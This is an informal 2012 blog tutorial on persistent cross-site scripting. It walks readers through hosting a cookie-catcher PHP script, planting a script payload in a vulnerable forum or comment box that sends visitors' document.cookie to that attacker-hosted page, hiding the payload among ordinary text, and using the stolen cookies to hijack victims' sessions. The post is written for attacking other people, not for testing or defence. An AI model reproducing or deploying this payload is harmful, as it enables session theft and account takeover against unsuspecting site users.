New Post

Sunday, September 16, 2012

Hey awl :D welcome once again :P _____again in diz tut we will be talkinga bt xss :D n in diz tut we will concentrate on  persistent  based XSS :)  S0 here we go :D


Persistent




    So,let us assume that we have found a XSS vulnerable forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS attack. 

    So now lets try to grab it's cookies. 


    First of all download a cookie catcher tool online by searching on google and upload it on any free hosting site which supports php . 


    Now come to that vulnerable site and if there is a box to type and submit then add the following code in it:

    Code:<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

    Replace the bold link with the link of your cookie catcher uploaded on free hosting site. 


    Now submit that post in the forum or the comment box and I would suggest to add some text before or after it so that it wont look like a spam.

 
     Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php 

 
    Search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be: http://www.example.com/cookie catcher.php the container of the cookies would be: http://www.example.com/cookies.html


    Now save these cookies as we gonna use them to hijack session of victim.... ;)

0 nhận xét:

Post a Comment